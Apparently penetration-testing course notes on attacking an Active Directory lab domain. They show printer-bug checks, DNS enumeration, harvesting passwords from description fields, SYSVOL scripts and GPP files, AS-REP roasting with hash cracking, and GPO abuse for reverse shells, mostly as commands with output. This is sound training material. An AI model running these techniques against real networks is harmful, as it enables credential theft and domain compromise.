Printer Bug

We can use tools such as the Get-SpoolStatus module from this tool to check for machines vulnerable to the MS-PRN Printer Bug. This flaw can be used to compromise a host in another forest that has Unconstrained Delegation enabled, such as a domain controller. It can help us to attack across forest trusts once we have compromised one forest.

PS C:\xyz> Import-Module .\SecurityAssessment.ps1
PS C:\xyz> Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.legalcorp.local

ComputerName                        Status
------------                        ------
ACADEMY-EA-DC01.legalcorp.local   True

Enumerating DNS Records

We can use a tool such as adidnsdump to enumerate all DNS records in a domain using a valid domain user account.

neutron@kali[/kali]$ adidnsdump -u LEGALCORP\\forend ldap:// 


[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 27 records

It is worth running this tool in larger environments. We may uncover "hidden" records that can lead to discovering interesting hosts.

Password in Description Field

PS C:\xyz> Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}

samaccountname description
-------------- -----------
administrator  Built-in account for administering the computer/domain
guest          Built-in account for guest access to the computer/domain
krbtgt         Key Distribution Center Service Account
ldap.agent     *** DO NOT CHANGE ***  3/12/2012: Sunsh1ne4All!


It is possible to come across domain accounts with the passwd_notreqd field set in the userAccountControl attribute.

PS C:\xyz> Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

samaccountname                                                         useraccountcontrol
--------------                                                         ------------------
mlowe                                PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
ehamilton                            PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
$725000-9jb50uejje9f                       ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT
nagiosagent                                                PASSWD_NOTREQD, NORMAL_ACCOUNT

Credentials in SMB Shares and SYSVOL Scripts

The SYSVOL share is readable by all authenticated users in the domain. Here, we can see an interesting script named reset_local_admin_pass.vbs.

PS C:\xyz> ls \\academy-ea-dc01\SYSVOL\legalcorp.local\scripts

    Directory: \\academy-ea-dc01\SYSVOL\legalcorp.local\scripts

Mode                LastWriteTime         Length Name                                                                 
----                -------------         ------ ----                                                                 
-a----       11/18/2021  10:44 AM            174 daily-runs.zip                                                       
-a----        2/28/2022   9:11 PM            203 disable-nbtns.ps1                                                    
-a----         3/7/2022   9:41 AM         144138 Logon Banner.htm                                                     
-a----         3/8/2022   2:56 PM            979 reset_local_admin_pass.vbs  

Taking a closer look at the script, we see that it contains a password for the built-in local administrator on Windows hosts. It would be worth checking to see if this password is still set on any hosts in the domain.

PS C:\xyz> cat \\academy-ea-dc01\SYSVOL\legalcorp.local\scripts\reset_local_admin_pass.vbs

On Error Resume Next
strComputer = "."

Set oShell = CreateObject("WScript.Shell") 
sUser = "Administrator"
sPwd = "!lcorp_L0cALADmin!"

Set Arg = WScript.Arguments
If  Arg.Count > 0 Then
sPwd = Arg(0) 'Pass the password as parameter to the script
End if

'Get the administrator name
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")


Locating & Retrieving GPP Passwords with CrackMapExec

neutron@kali[/kali]$ crackmapexec smb -L | grep gpp

[*] gpp_autologin             Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password              Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

It is also possible to find passwords in files such as Registry.xml when autologon is configured via Group Policy.

neutron@kali[/kali]$ crackmapexec smb -u forend -p Klmcargo2 -M gpp_autologin

SMB      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:legalcorp.local) (signing:True) (SMBv1:False)
SMB      445    ACADEMY-EA-DC01  [+] legalcorp.local\forend:Klmcargo2 
GPP_AUTO...      445    ACADEMY-EA-DC01  [+] Found SYSVOL share
GPP_AUTO...      445    ACADEMY-EA-DC01  [*] Searching for Registry.xml
GPP_AUTO...      445    ACADEMY-EA-DC01  [*] Found legalcorp.local/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO...      445    ACADEMY-EA-DC01  [+] Found credentials in legalcorp.local/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO...      445    ACADEMY-EA-DC01  Usernames: ['guarddesk']
GPP_AUTO...      445    ACADEMY-EA-DC01  Domains: ['legalcorp.local']
GPP_AUTO...      445    ACADEMY-EA-DC01  Passwords: ['lcorpguardadmin!']

We can see that we have retrieved the credentials for an account called guarddesk. This may have been set up so that shared workstations used by guards automatically log in at boot to accommodate multiple users throughout the day and night working different shifts. In this case, the credentials are likely a local admin, so it would be worth finding hosts where we can log in as an admin and hunt for additional data. Whenever we obtain credentials, we should check to see if we can use them to access other hosts, leverage any rights such as interesting ACLs, access shares, or use the password in a password spraying attack to uncover password re-use and maybe an account that grants us further access towards our goal.


It's possible to obtain the Ticket Granting Ticket (TGT) for any account that has the Do not require Kerberos pre-authentication setting enabled.

Like Kerberoasting, the success of this attack depends on the account having a relatively weak password.

PS C:\xyz> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

samaccountname     : mmorgan
userprincipalname  : [email protected]

This attack does not require any domain user context and can be done by just knowing the SAM name for the user without Kerberos pre-auth.

PS C:\xyz> .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: AS-REP roasting

[*] Target User            : mmorgan
[*] Target Domain          : legalcorp.local

[*] Searching path 'LDAP://ACADEMY-EA-DC01.legalcorp.local/DC=LEGALCORP,DC=LOCAL' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(samAccountName=mmorgan))'
[*] SamAccountName         : mmorgan
[*] DistinguishedName      : CN=Matthew Morgan,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=LEGALCORP,DC=LOCAL
[*] Using domain controller: ACADEMY-EA-DC01.legalcorp.local (
[*] Building AS-REQ (w/o preauth) for: 'legalcorp.local\mmorgan'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
     $krb5a[email protected]:D18650F4F4E0537E0188A6897A478C55$0978822DEC13046712DB7DC03F6C4DE059A946485451AAE98BB93DFF8E3E64F3AA5614160F21A029C2B9437CB16E5E9DA4A2870FEC0596B09BADA989D1F8057262EA40840E8D0F20313B4E9A40FA5E4F987FF404313227A7BFFAE748E07201369D48ABB4727DFE1A9F09D50D7EE3AA5C13E4433E0F9217533EE0E74B02EB8907E13A208340728F794ED5103CB3E5C7915BF2F449AFDA41988FF48A356BF2BE680A25931A8746A99AD3E757BFE097B852F72CEAE1B74720C011CFF7EC94CBB6456982F14DA17213B3B27DFA1AD4C7B5C7120DB0D70763549E5144F1F5EE2AC71DDFC4DCA9D25D39737DC83B6BC60E0A0054FC0FD2B2B48B25C6CA
neutron@kali[/kali]$ hashcat -m 18200 lcorp_asrep /usr/share/wordlists/rockyou.txt 

hashcat (v6.1.1) starting...


When performing user enumeration with Kerbrute, the tool will automatically retrieve the AS-REP for any users found that do not require Kerberos pre-authentication.

neutron@kali[/kali]$ kerbrute userenum -d legalcorp.local --dc /opt/jsmith.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 13:14:17 >  Using KDC(s):
2022/04/01 13:14:17 >

2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] VALID USERNAME:   [email protected]
2022/04/01 13:14:17 >  [+] mmorgan has no pre auth required. Dumping hash to crack offline:
[email protected]:400d306dda575be3d429aad39ec68a33$8698ee566cde591a7ddd1782db6f7ed8531e266befed4856b9fcbbdda83a0c9c5ae4217b9a43d322ef35a6a22ab4cbc86e55a1fa122a9f5cb22596084d6198454f1df2662cb00f513d8dc3b8e462b51e8431435b92c87d200da7065157a6b24ec5bc0090e7cf778ae036c6781cc7b94492e031a9c076067afc434aa98e831e6b3bff26f52498279a833b04170b7a4e7583a71299965c48a918e5d72b5c4e9b2ccb9cf7d793ef322047127f01fd32bf6e3bb5053ce9a4bf82c53716b1cee8f2855ed69c3b92098b255cc1c5cad5cd1a09303d83e60e3a03abee0a1bb5152192f3134de1c0b73246b00f8ef06c792626fd2be6ca7af52ac4453e6a


With a list of valid users, we can use Get-NPUsers.py to search for all users with Kerberoast pre-authentication not required.

neutron@kali[/kali]$ GetNPUsers.py legalcorp.local/ -dc-ip -no-pass -usersfile valid_ad_users 
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]@legalcorp.local:47e0d517f2a5815da8345dd9247a0e3d$b62d45bc3c0f4c306402a205ebdbbc623d77ad016e657337630c70f651451400329545fb634c9d329ed024ef145bdc2afd4af498b2f0092766effe6ae12b3c3beac28e6ded0b542e85d3fe52467945d98a722cb52e2b37325a53829ecf127d10ee98f8a583d7912e6ae3c702b946b65153bac16c97b7f8f2d4c2811b7feba92d8bd99cdeacc8114289573ef225f7c2913647db68aafc43a1c98aa032c123b2c9db06d49229c9de94b4b476733a5f3dc5cc1bd7a9a34c18948edf8c9c124c52a36b71d2b1ed40e081abbfee564da3a0ebc734781fdae75d3882f3d1d68afdb2ccb135028d70d1aa3c0883165b3321e7a1c5c8d7c215f12da8bba9
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User [email protected] doesn't have UF_DONT_REQUIRE_PREAUTH set


Group Policy Object (GPO) Abuse

GPO misconfigurations can be abused to perform the following attacks:

  • Adding additional rights to a user (such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeImpersonatePrivilege)
  • Adding a local admin user to one or more hosts
  • Creating an immediate scheduled task to perform any number of actions

Using the Get-DomainGPO function from PowerView, we can get a listing of GPOs by name.

PS C:\xyz> Get-DomainGPO |select displayname

Default Domain Policy
Default Domain Controllers Policy
Deny Control Panel Access
Disallow LM Hash
Deny CMD Access
Disable Forced Restarts
Block Removable Media
Disable Guest Account
Service Accounts Password Policy
Logon Banner
Disconnect Idle RDP
Disable NetBIOS
Certificate Services

If Group Policy Management Tools are installed on the host we are working from, we can use various built-in GroupPolicy cmdlets such as Get-GPO to perform the same enumeration.

PS C:\xyz> Get-GPO -All | Select DisplayName

Certificate Services
Default Domain Policy
Disable NetBIOS
Disable Guest Account
Default Domain Controllers Policy
Disconnect Idle RDP
Disallow LM Hash
Deny CMD Access
Block Removable Media
Service Accounts Password Policy
Logon Banner
Disable Forced Restarts
Deny Control Panel Access

Enumerating Domain User GPO Rights

PS C:\xyz> $sid=Convert-NameToSid "Domain Users"
PS C:\xyz> Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

ObjectDN              : CN={7CA9C789-14CE-46E3-A722-83F4097AF532},CN=Policies,CN=System,DC=LEGALCORP,DC=LOCAL
ObjectSID             :
ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, Delete, GenericExecute, WriteDacl,
BinaryLength          : 36
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 983095
SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-513
AceType               : AccessAllowed
AceFlags              : ObjectInherit, ContainerInherit
IsInherited           : False
InheritanceFlags      : ContainerInherit, ObjectInherit
PropagationFlags      : None
AuditFlags            : None

Here we can see that the Domain Users group has various permissions over a GPO, such as WriteProperty and WriteDacl, which we could leverage to give ourselves full control over the GPO and pull off any number of attacks that would be pushed down to any users and computers in OUs that the GPO is applied to. We can use the GPO GUID combined with Get-GPO to see the display name of the GPO.

PS C:\xyz Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532

DisplayName      : Disconnect Idle RDP
DomainName       : legalcorp.local
Owner            : LEGALCORP\Domain Admins
Id               : 7ca9c789-14ce-46e3-a722-83f4097af532
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 10/28/2021 3:34:07 PM
ModificationTime : 4/5/2022 6:54:25 PM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 0, SysVol Version: 0
WmiFilter        :

Checking in BloodHound, we can see that the Domain Users group has several rights over the Disconnect Idle RDP GPO, which could be leveraged for full control of the object.


If we select the GPO in BloodHound and scroll down to Affected Objects on the Node Info tab, we can see that this GPO is applied to one OU, which contains four computer objects.


We could use a tool such as SharpGPOAbuse to take advantage of this GPO misconfiguration by performing actions such as adding a user that we control to the local admins group on one of the affected hosts, creating an immediate scheduled task on one of the hosts to give us a reverse shell, or configure a malicious computer startup script to provide us with a reverse shell or similar.